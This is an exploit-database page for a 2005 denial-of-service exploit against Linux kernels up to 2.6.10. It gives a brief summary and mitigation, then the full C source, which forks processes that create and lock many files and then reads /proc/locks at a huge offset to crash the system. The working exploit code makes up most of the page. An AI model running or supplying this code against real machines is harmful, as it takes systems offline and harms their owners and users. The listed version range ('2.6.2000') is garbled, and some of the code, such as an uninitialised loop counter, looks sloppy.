header-logo
Suggest Exploit
vendor:
Linux Kernel
by:
ChoiX
7.5
CVSS
HIGH
DOS
CWE
Product Name: Linux Kernel
Affected Version From: 2.6.2000
Affected Version To: 2.6.10
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
2005

linux kernel <=2.6.10(2.6.x) DOS exploit

This exploit targets the linux kernel versions up to 2.6.10 (2.6.x) and causes a denial of service (DOS) by creating multiple files and locking them. It is written by ChoiX and belongs to the uKt Research team. The exploit starts by creating files with specific names and then locks them. It continues to create files until the system crashes.

Mitigation:

Update the linux kernel to a version higher than 2.6.10 to prevent this DOS exploit.
Source

Exploit-DB raw data:

/* Removed ='s at the bottom /str0ke */

/*
 * linux kernel <=2.6.10(2.6.x) DOS exploit
 * writen by ChoiX
 * (c) uKt Research
 * [www.unl0ck.org][info@unl0ck.org]
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <linux/unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/file.h>
#include <syscall.h>
#include <errno.h>

#define SIZE 0x80004242

_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res, uint, wh);

void createfile(){
int nm1, filev;
char vname[424];

for(nm1=0;nm1<920;nm1++){
	snprintf(vname, sizeof(vname), "UNLOCKRESEARCHTEAM%d.%d", getpid(), nm1);
	filev = open(vname, O_CREAT|O_RDWR, S_IRWXU);
	if(filev < 0){
		printf("ERROR\n");
		perror("open()");
	}
	if(flock(filev,LOCK_EX) == -1){
		printf("ERROR\n");
		perror("flock()");
	}
}
while(42);
}

int main(int argc, char *argv[]){
int count, fd, i, fv;
void *mv;
char *buf1, *buf2;
loff_t lr;
int nm1;

printf("\t\tkernel-2.6.10 DoS by ChoiX [Unl0ck Team]\n");
printf("[--]create files(it can take a few minutes)...");
nm1 = 5;
while(count--){
	if(!fork()){
		createfile();
	}
}
sleep(100);

printf("OK\n");

printf("[--]start exploiting...");

system("sync");
fd=open("/proc/locks", O_RDONLY);
if(fd < 0){
	printf("ERROR\n");
	perror("open()");
}
buf1 = malloc(1024*1024*8);
buf2 = malloc(1024*1024*8);

if(_llseek(fd,42,SIZE,&lr,SEEK_SET) == -1){
	printf("ERROR\n");
	printf("llseek()");
}
i=read(fd,buf2, SIZE);
perror("read");
printf("read=%d mv=%x fv=%x\n %.300s",i,(int)mv,fv,buf2);
while(42);
return 42;
}

// milw0rm.com [2005-03-29]

Navigation

Suggest Exploit

Services By CQR